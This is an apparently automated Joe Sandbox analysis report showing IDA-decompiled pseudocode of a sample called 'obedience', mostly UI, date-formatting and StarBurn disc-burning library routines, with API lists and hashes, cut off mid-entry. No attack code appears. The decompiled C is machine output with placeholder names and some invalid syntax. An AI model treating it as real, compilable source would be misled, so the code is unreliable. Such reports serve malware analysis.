      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Burn_BurnerCdvdCloseGrabber_SessionStar
      • String ID: CdvdBurnerGrabber_CloseSession$StarBurn_CdvdBurnerGrabber_CloseSession() failed, exception %d, status %d, text "%s"\n
      • API String ID: 487153683-1136846341
      • Opcode ID: f7be73a541ed10ab19f976354792e318791e09665d19e505704e5457b42c8a52
      • Instruction ID: 5d0d54d665e4d5644b5300cbcd4afb509acf91d020b014e96ec73f10926756af
      • Opcode Fuzzy Hash: f7be73a541ed10ab19f976354792e318791e09665d19e505704e5457b42c8a52
      • Instruction Fuzzy Hash: 72413B746006449FDB08DF69C481B9AB7F4FF48304F1189AAE909EB362D774ED44CBA4
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 73%
      			E00457EF8(intOrPtr __eax, void* __ecx, void* __edx) {
      				char _v8;
      				signed short _v10;
      				intOrPtr _v16;
      				char _v17;
      				char _v24;
      				intOrPtr _t34;
      				intOrPtr _t40;
      				intOrPtr _t42;
      				intOrPtr _t48;
      				void* _t51;
      				void* _t53;
      				void* _t56;
      				void* _t59;
      				intOrPtr _t65;
      				intOrPtr _t68;
      				void* _t70;
      				void* _t72;
      				intOrPtr _t73;
      
      				_t53 = __ecx;
      				_t70 = _t72;
      				_t73 = _t72 + 0xffffffec;
      				_t51 = __edx;
      				_v16 = __eax;
      				_v10 =  *((intOrPtr*)(__edx + 4));
      				if(_v10 == 0) {
      					return 0;
      				} else {
      					if(GetKeyState(0x10) < 0) {
      						_v10 = _v10 + 0x2000;
      					}
      					if(GetKeyState(0x11) < 0) {
      						_v10 = _v10 + 0x4000;
      					}
      					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
      						_v10 = _v10 + 0x8000;
      					}
      					_v24 =  *((intOrPtr*)(_v16 + 0x34));
      					_t34 =  *0x490b70; // 0x2480da8
      					E0042CE2C(_t34, _t53,  &_v24);
      					_push(_t70);
      					_push(0x457ff6);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t73;
      					while(1) {
      						_v17 = 0;
      						_v8 = E00457BFC(_v16, 2, _v10 & 0x0000ffff);
      						if(_v8 != 0) {
      							break;
      						}
      						if(_v24 == 0 || _v17 != 2) {
      							_pop(_t65);
      							_pop(_t56);
      							 *[fs:eax] = _t65;
      							_push(0x457ffd);
      							_t40 =  *0x490b70; // 0x2480da8
      							return E0042CE18(_t40, _t56);
      						} else {
      							continue;
      						}
      						goto L14;
      					}
      					_t42 =  *0x490b70; // 0x2480da8
      					E0042CE2C(_t42, 2,  &_v8);
      					_push(_t70);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t73;
      					_v17 = E00457DA4( &_v8, 0, _t70);
      					_pop(_t68);
      					_t59 = 0x457fcb;
      					 *[fs:eax] = _t68;
      					_push(0x457fd2);
      					_t48 =  *0x490b70; // 0x2480da8
      					return E0042CE18(_t48, _t59);
      				}
      				L14:
      			}

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: State
      • String ID:
      • API String ID: 1649606143-3916222277
      • Opcode ID: 8fa8b146ecb80273c31dbc0b0b139a7ee122f0438dbf271a412a636a48374a68
      • Instruction ID: 4d3d525132fe02906f57321bbb059df692b0ea43ed6aee37409f354fac11ccbd
      • Opcode Fuzzy Hash: 8fa8b146ecb80273c31dbc0b0b139a7ee122f0438dbf271a412a636a48374a68
      • Instruction Fuzzy Hash: 8531E535A0C608EFDB11DBA9E8516ADB7F5EF48304F5184BBEC00A7292E7785E04C669
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 73%
      			E00472C5C(intOrPtr __eax, void* __ebx, intOrPtr __edx) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				char _v16;
      				char _v20;
      				intOrPtr _v24;
      				intOrPtr _v28;
      				void* _v32;
      				char _v36;
      				intOrPtr _t31;
      				intOrPtr _t48;
      				intOrPtr _t51;
      				intOrPtr _t56;
      				int _t57;
      				intOrPtr _t64;
      				void* _t68;
      				void* _t69;
      				intOrPtr _t70;
      
      				_t68 = _t69;
      				_t70 = _t69 + 0xffffffe0;
      				_v36 = 0;
      				_t56 = __edx;
      				_v8 = __eax;
      				_push(_t68);
      				_push(0x472d5d);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t70;
      				_t31 =  *((intOrPtr*)(_v8 + 0x18));
      				if(_t31 == 0) {
      					_v20 = E00403BC0(1);
      				} else {
      					_v20 = _t31;
      				}
      				_v12 = _t56;
      				_v16 = _v20;
      				_push(_t68);
      				_push(0x472d40);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t70;
      				_v32 =  &_v16;
      				_v24 = E0047299C;
      				_v28 = 0;
      				if( *((char*)(_v8 + 0x14)) == 0) {
      					_t57 = 2;
      				} else {
      					_t57 = 1;
      				}
      				SendMessageA(E0044B158( *((intOrPtr*)(_v8 + 0x10))), 0x44a, _t57,  &_v32);
      				if(_v28 != 0) {
      					_t51 =  *0x48f558; // 0x466c70
      					E00406A3C(_t51, 0,  &_v36);
      					E0040CBEC(_v36, 1);
      					E004043D0();
      				}
      				_pop(_t64);
      				 *[fs:eax] = _t64;
      				_push(0x472d47);
      				_t48 = _v8;
      				if( *((intOrPtr*)(_t48 + 0x18)) == 0) {
      					return E00403BF0(_v20);
      				}
      				return _t48;
      			}

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MessageSend
      • String ID: TsA$plF
      • API String ID: 3850602802-2407894139
      • Opcode ID: c5de53af42f093df29b3229f135aae2e395e54f57386b0bcf413a0472f189094
      • Instruction ID: 99d74facfabb791e8234d1e0b373a51ecaaf0135dc5bbbc03565ca85f40ff521
      • Opcode Fuzzy Hash: c5de53af42f093df29b3229f135aae2e395e54f57386b0bcf413a0472f189094
      • Instruction Fuzzy Hash: 82312A70A04208DFDB15DFA9C991AEEB7F9EB08304F51847AE804E7391D378AE40DB58
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 72%
      			E0040B16C(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
      				char _v8;
      				short _v18;
      				short _v22;
      				struct _SYSTEMTIME _v24;
      				char _v280;
      				char* _t32;
      				intOrPtr* _t49;
      				intOrPtr _t58;
      				void* _t63;
      				void* _t67;
      
      				_v8 = 0;
      				_t49 = __edx;
      				_t63 = __eax;
      				_push(_t67);
      				_push(0x40b24a);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t67 + 0xfffffeec;
      				E00404A40(__edx);
      				_v24 =  *((intOrPtr*)(_a4 - 0xe));
      				_v22 =  *((intOrPtr*)(_a4 - 0x10));
      				_v18 =  *((intOrPtr*)(_a4 - 0x12));
      				if(_t63 > 2) {
      					E00404AD8( &_v8, 0x40b26c);
      				} else {
      					E00404AD8( &_v8, 0x40b260);
      				}
      				_t32 = E00404F00(_v8);
      				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
      					E00404CB0(_t49, 0x100,  &_v280);
      					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
      						E00404F60( *_t49, E00404D00( *_t49) - 1, 2, _t49);
      					}
      				}
      				_pop(_t58);
      				 *[fs:eax] = _t58;
      				_push(E0040B251);
      				return E00404A40( &_v8);
      			}

      APIs
      • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0040B24A), ref: 0040B1F2
      • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0040B24A), ref: 0040B1F8
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: DateFormatLocaleThread
      • String ID: yyyy
      • API String ID: 3303714858-3145165042
      • Opcode ID: 7394044a764889e73c70c8f39c9455ce97186d1c013f34385f4049e8c563a289
      • Instruction ID: 726c8018816bf8a90a038004f829d2eb04d24c23c4fd45e79bdfeee3bccf8b85
      • Opcode Fuzzy Hash: 7394044a764889e73c70c8f39c9455ce97186d1c013f34385f4049e8c563a289
      • Instruction Fuzzy Hash: 282144746042089FDB01EB65D846A9E73A8EF88700F5140BAFA05F77D1D7789E40CBAD
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 63%
      			E00481C48(void* __eax, void* __ebx, void* __edi, void* __esi, void* __fp0) {
      				char _v8;
      				char _v12;
      				intOrPtr _v16;
      				char _v20;
      				intOrPtr _v24;
      				char _v28;
      				char _v32;
      				intOrPtr _t39;
      				intOrPtr _t43;
      				char _t48;
      				intOrPtr _t58;
      				void* _t66;
      				void* _t69;
      
      				_t76 = __fp0;
      				_t64 = __edi;
      				_push(__ebx);
      				_v8 = 0;
      				_t66 = __eax;
      				_push(_t69);
      				_push(0x481d3a);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t69 + 0xffffffe4;
      				 *((char*)(__eax + 0xe0)) = 0;
      				if( *((intOrPtr*)(__eax + 0xd8)) != 0) {
      					_t43 =  *0x490c50; // 0x0
      					E0047FD7C(_t43, __ebx, 0, "CdvdBurnerGrabber_Lock", __edi, __eax, __fp0);
      					_push(_t66 + 0x4e8);
      					_push(_t66 + 0xe4);
      					_push(0x400);
      					_push(_t66 + 0xe8);
      					_t48 =  *((intOrPtr*)(_t66 + 0xd8));
      					_push(_t48);
      					L00465E8C();
      					 *((char*)(_t66 + 0xe0)) = _t48;
      				}
      				_t50 =  *((intOrPtr*)(_t66 + 0xe0));
      				if( *((intOrPtr*)(_t66 + 0xe0)) != 0) {
      					_v32 = 0;
      					_v28 = 0;
      					_v24 =  *((intOrPtr*)(_t66 + 0xe4));
      					_v20 = 0;
      					_v16 = _t66 + 0xe8;
      					_v12 = 6;
      					E0040A164("StarBurn_CdvdBurnerGrabber_Lock() failed, exception %d, status %d, text \"%s\"\\n", 2,  &_v32,  &_v8);
      					E00404A94(_t66 + 4, _v8);
      					_t39 =  *0x490c50; // 0x0
      					E0047FD7C(_t39, _t50, 0,  *((intOrPtr*)(_t66 + 4)), _t64, _t66, _t76);
      					E0043DCAC(0);
      				}
      				_pop(_t58);
      				 *[fs:eax] = _t58;
      				_push(0x481d41);
      				return E00404A40( &_v8);
      			}

      APIs
      • StarBurn_CdvdBurnerGrabber_Lock.STARBURN(00000000,?,00000400,?,?,00000000,00481D3A), ref: 00481CA7
      Strings
      • StarBurn_CdvdBurnerGrabber_Lock() failed, exception %d, status %d, text "%s"\n, xrefs: 00481CED
      • CdvdBurnerGrabber_Lock, xrefs: 00481C77
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Burn_BurnerCdvdGrabber_LockStar
      • String ID: CdvdBurnerGrabber_Lock$StarBurn_CdvdBurnerGrabber_Lock() failed, exception %d, status %d, text "%s"\n
      • API String ID: 2715423426-2712867585
      • Opcode ID: d790bbaf1ded93fabbb57ed30ada9169490d11b60312f066c440a5672fd9e236
      • Instruction ID: ea7429df3c935f8aee7207ffbee2362b5feb0ade4ab6996301024955729a3efe
      • Opcode Fuzzy Hash: d790bbaf1ded93fabbb57ed30ada9169490d11b60312f066c440a5672fd9e236
      • Instruction Fuzzy Hash: 4C216B70604A849FD711DB78C841BDFB7E8AB49304F10887FE59AE7291D778BA05CB68
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 63%
      			E00481DC4(void* __eax, void* __ebx, void* __edi, void* __esi, void* __fp0) {
      				char _v8;
      				char _v12;
      				intOrPtr _v16;
      				char _v20;
      				intOrPtr _v24;
      				char _v28;
      				char _v32;
      				intOrPtr _t39;
      				intOrPtr _t43;
      				char _t48;
      				intOrPtr _t58;
      				void* _t66;
      				void* _t69;
      
      				_t76 = __fp0;
      				_t64 = __edi;
      				_push(__ebx);
      				_v8 = 0;
      				_t66 = __eax;
      				_push(_t69);
      				_push(0x481eb6);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t69 + 0xffffffe4;
      				 *((char*)(__eax + 0xe0)) = 0;
      				if( *((intOrPtr*)(__eax + 0xd8)) != 0) {
      					_t43 =  *0x490c50; // 0x0
      					E0047FD7C(_t43, __ebx, 0, "CdvdBurnerGrabber_Release", __edi, __eax, __fp0);
      					_push(_t66 + 0x4e8);
      					_push(_t66 + 0xe4);
      					_push(0x400);
      					_push(_t66 + 0xe8);
      					_t48 =  *((intOrPtr*)(_t66 + 0xd8));
      					_push(_t48);
      					L00465E94();
      					 *((char*)(_t66 + 0xe0)) = _t48;
      				}
      				_t50 =  *((intOrPtr*)(_t66 + 0xe0));
      				if( *((intOrPtr*)(_t66 + 0xe0)) != 0) {
      					_v32 = 0;
      					_v28 = 0;
      					_v24 =  *((intOrPtr*)(_t66 + 0xe4));
      					_v20 = 0;
      					_v16 = _t66 + 0xe8;
      					_v12 = 6;
      					E0040A164("StarBurn_CdvdBurnerGrabber_Release() failed, exception %d, status %d, text \"%s\"\\n", 2,  &_v32,  &_v8);
      					E00404A94(_t66 + 4, _v8);
      					_t39 =  *0x490c50; // 0x0
      					E0047FD7C(_t39, _t50, 0,  *((intOrPtr*)(_t66 + 4)), _t64, _t66, _t76);
      					E0043DCAC(0);
      				}
      				_pop(_t58);
      				 *[fs:eax] = _t58;
      				_push(0x481ebd);
      				return E00404A40( &_v8);
      			}

      APIs
      • StarBurn_CdvdBurnerGrabber_Release.STARBURN(00000000,0048172F,00000400,00000000,?,00000000,00481EB6), ref: 00481E23
      Strings
      • StarBurn_CdvdBurnerGrabber_Release() failed, exception %d, status %d, text "%s"\n, xrefs: 00481E69
      • CdvdBurnerGrabber_Release, xrefs: 00481DF3
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Burn_BurnerCdvdGrabber_ReleaseStar
      • String ID: CdvdBurnerGrabber_Release$StarBurn_CdvdBurnerGrabber_Release() failed, exception %d, status %d, text "%s"\n
      • API String ID: 216732225-111072396
      • Opcode ID: d50bdebe7711ede4e135d3dae4bfe032e4449a2f7e11e5801d3bd7d0e145ccef
      • Instruction ID: 0536b803b048c61647dc510b7b9694a0fde26dd8f3c18ed264dc2f75cc415e1f
      • Opcode Fuzzy Hash: d50bdebe7711ede4e135d3dae4bfe032e4449a2f7e11e5801d3bd7d0e145ccef
      • Instruction Fuzzy Hash: D821A1706047849FC720DB74C841BEFB7E8AB49304F10887FE59AE7251D7786A05CB68
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E6ED94C00(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
      				intOrPtr _t10;
      				intOrPtr _t11;
      				intOrPtr _t16;
      				intOrPtr* _t19;
      				intOrPtr _t24;
      				intOrPtr _t27;
      				intOrPtr* _t28;
      				intOrPtr _t31;
      				intOrPtr* _t34;
      
      				_t34 = __ecx;
      				_t10 =  *((intOrPtr*)(__ecx + 0x10));
      				_t24 = _a4;
      				if(_t10 < _t24) {
      					_t10 = E6EDA298A("invalid string position");
      				}
      				_t31 = _a8;
      				_t11 = _t10 - _t24;
      				if(_t11 < _t31) {
      					_t31 = _t11;
      				}
      				if(_t31 == 0) {
      					L14:
      					return _t34;
      				} else {
      					_t27 =  *((intOrPtr*)(_t34 + 0x14));
      					if(_t27 < 0x10) {
      						_t19 = _t34;
      					} else {
      						_t19 =  *_t34;
      					}
      					if(_t27 < 0x10) {
      						_t28 = _t34;
      					} else {
      						_t28 =  *_t34;
      					}
      					L6ED95E80(_t28 + _t24, _t19 + _t24 + _t31, _t11 - _t31);
      					_t16 =  *((intOrPtr*)(_t34 + 0x10)) - _t31;
      					 *((intOrPtr*)(_t34 + 0x10)) = _t16;
      					if( *((intOrPtr*)(_t34 + 0x14)) < 0x10) {
      						 *((char*)(_t34 + _t16)) = 0;
      						goto L14;
      					} else {
      						 *((char*)( *_t34 + _t16)) = 0;
      						return _t34;
      					}
      				}
      			}

      APIs
      • std::_Xinvalid_argument.LIBCPMT ref: 6ED94C16
        • Part of subcall function 6EDA298A: std::exception::exception.LIBCMT ref: 6EDA299F
        • Part of subcall function 6EDA298A: __CxxThrowException@8.LIBCMT ref: 6EDA29B4
        • Part of subcall function 6EDA298A: std::exception::exception.LIBCMT ref: 6EDA29C5
      • _memmove.LIBCMT ref: 6ED94C4F
      Strings
      • invalid string position, xrefs: 6ED94C11
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
      • String ID: invalid string position
      • API String ID: 1785806476-1799206989
      • Opcode ID: ccf203b1eafd4031f428f8e4bd66945964f5eed0c1fca6c21bf434f8e72347a7
      • Instruction ID: 06fa0d0846c296b47c5e790f2cb72cfeae8b9b7507858c9d182787c4f2bdb0a9
      • Opcode Fuzzy Hash: ccf203b1eafd4031f428f8e4bd66945964f5eed0c1fca6c21bf434f8e72347a7
      • Instruction Fuzzy Hash: 6001DB713002115FD3248FECECD055EB7AADB85654724492DD191CB702D7B2DC4397A1
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00444CE4(void* __eflags, intOrPtr _a4) {
      				char _v5;
      				struct tagRECT _v21;
      				struct tagRECT _v40;
      				void* _t40;
      				void* _t41;
      				void* _t46;
      
      				_v5 = 1;
      				_t45 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
      				_t46 = E00419CE8( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
      				if(_t46 <= 0) {
      					L5:
      					_v5 = 0;
      				} else {
      					do {
      						_t46 = _t46 - 1;
      						_t40 = E00419C84(_t45, _t41, _t46);
      						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
      							goto L4;
      						} else {
      							E004442C8(_t40,  &_v40);
      							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
      							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
      								goto L4;
      							}
      						}
      						goto L6;
      						L4:
      					} while (_t46 > 0);
      					goto L5;
      				}
      				L6:
      				return _v5;
      			}

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Rect$EqualIntersect
      • String ID: @
      • API String ID: 3291753422-2766056989
      • Opcode ID: 49e2f86785b09432fbc8fb17c1a699ece156651e464f809a47d83f4a535d0874
      • Instruction ID: 96c604251c54ca3a57d773fc6756e2f2d06e5342deca8a0050f10d6c1d342416
      • Opcode Fuzzy Hash: 49e2f86785b09432fbc8fb17c1a699ece156651e464f809a47d83f4a535d0874
      • Instruction Fuzzy Hash: E2118C71A042485BD711DA6CC885BDE7BECAF89318F044296FC44EB392D779ED0587D4
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 64%
      			E0047F2D0(void* __eax, void* __ebx, void* __edi, void* __esi, void* __fp0) {
      				char _v8;
      				char _v12;
      				char _v16;
      				intOrPtr _t16;
      				intOrPtr _t18;
      				intOrPtr _t24;
      				intOrPtr _t37;
      				void* _t44;
      				void* _t47;
      
      				_push(__ebx);
      				_v8 = 0;
      				_t44 = __eax;
      				_push(_t47);
      				_push(0x47f37b);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t47 + 0xfffffff4;
      				if( *((char*)(__eax + 0x300)) == 0) {
      					_t16 =  *0x490c50; // 0x0
      					E0047FD7C(_t16, __ebx, 0, "UpStartEx", __edi, __eax, __fp0);
      					_push(0x404);
      					_t18 =  *0x48f738; // 0x48f11c
      					_push(_t18);
      					L00465F1C();
      					_t29 = _t18;
      					if(_t18 != 0) {
      						_v16 = 0;
      						_v12 = 0;
      						E0040A164("StarBurn_UpStartEx() failed, exception %d", 0,  &_v16,  &_v8);
      						_t24 =  *0x490c50; // 0x0
      						E0047FD7C(_t24, _t29, 0, _v8, __edi, _t44, __fp0);
      						E0040CBEC(_v8, 1);
      						E004043D0();
      					}
      					 *((char*)(_t44 + 0x300)) = 1;
      				}
      				_pop(_t37);
      				 *[fs:eax] = _t37;
      				_push(0x47f382);
      				return E00404A40( &_v8);
      			}

      APIs
      • StarBurn_UpStartEx.STARBURN(0048F11C,00000404), ref: 0047F312
      Strings
      • StarBurn_UpStartEx() failed, exception %d, xrefs: 0047F331
      • UpStartEx, xrefs: 0047F2F8
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Burn_StarStart
      • String ID: StarBurn_UpStartEx() failed, exception %d$UpStartEx
      • API String ID: 3289349704-2336405461
      • Opcode ID: aabaef79e9323e5694d82e4de21333493d49e20ab48a72ed9d8258171a09a1aa
      • Instruction ID: f5cc1f42aabb814b6f928613fecb1e716dffad8fe5680306ab4916872375d34c
      • Opcode Fuzzy Hash: aabaef79e9323e5694d82e4de21333493d49e20ab48a72ed9d8258171a09a1aa
      • Instruction Fuzzy Hash: EC1106706086049FD715DB79D851ACE77E8EB48304F50C47AF509D7291DB389E08872C
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 68%
      			E0042D7D0(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
      				void* __ebx;
      				void* __esi;
      				void* __ebp;
      				void* _t15;
      				void* _t16;
      				intOrPtr _t18;
      				signed int _t19;
      				void* _t20;
      				intOrPtr _t21;
      
      				_t19 = _a12;
      				if( *0x49092f != 0) {
      					_t16 = 0;
      					if((_t19 & 0x00000003) != 0) {
      						L7:
      						_t16 = 0x12340042;
      					} else {
      						_t21 = _a4;
      						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
      							goto L7;
      						}
      					}
      				} else {
      					_t18 =  *0x490910; // 0x42d7d0
      					 *0x490910 = E0042D52C(3, _t15, "MonitorFromPoint", _t18, _t20);
      					_t16 =  *0x490910(_a4, _a8, _t19);
      				}
      				return _t16;
      			}

      APIs
      • GetSystemMetrics.USER32 ref: 0042D81E
      • GetSystemMetrics.USER32 ref: 0042D830
        • Part of subcall function 0042D52C: GetProcAddress.KERNEL32(75BA0000,00000000), ref: 0042D5B0
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MetricsSystem$AddressProc
      • String ID: MonitorFromPoint
      • API String ID: 1792783759-1072306578
      • Opcode ID: fceb17176bff4f997dbfbf20607a6347ff685c3a4e4c8991f75ca1fd88df6831
      • Instruction ID: 2756e11eb847ced657889ba680d9332bce9c9e3530b02444c1025df721020c62
      • Opcode Fuzzy Hash: fceb17176bff4f997dbfbf20607a6347ff685c3a4e4c8991f75ca1fd88df6831
      • Instruction Fuzzy Hash: 710186B1B05228AFEB006F55FC44B6B7B65EB94354F90403BF9249B252C3B5AD41CBAC
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 72%
      			E0044CCDC(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4) {
      				intOrPtr _v8;
      				char _v12;
      				char _v16;
      				void* _t22;
      				void* _t28;
      
      				_v8 = __ecx;
      				_t28 = __eax;
      				_t22 = 0;
      				if(E004519AC(__eax) != 0) {
      					_t32 = __edx -  *((intOrPtr*)(_t28 + 0x6c));
      					if(__edx !=  *((intOrPtr*)(_t28 + 0x6c))) {
      						E0044CD40(_t28, _t32);
      						 *((intOrPtr*)(_t28 + 0x6c)) = __edx;
      						_t5 =  &_a4; // 0x4429e4
      						E0044CACC(__edx,  *_t5, _v8,  &_v16);
      						_t7 =  &_v12; // 0x4429e4
      						_push( *_t7);
      						_push(_v16);
      						_push( *((intOrPtr*)(_t28 + 0x6c)));
      						L0042D04C();
      						asm("sbb ebx, ebx");
      						_t22 = __edx + 1;
      					}
      				}
      				return _t22;
      			}

      APIs
        • Part of subcall function 0044CD40: 6F92B200.COMCTL32(?,00000000,0044CD05,00000000,00000000,00000000), ref: 0044CD58
        • Part of subcall function 0044CACC: ClientToScreen.USER32(?,0044CD88), ref: 0044CAE4
        • Part of subcall function 0044CACC: GetWindowRect.USER32 ref: 0044CAEE
      • 6F92B190.COMCTL32(?,?,)D,?,00000000,00000000,00000000), ref: 0044CD27
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
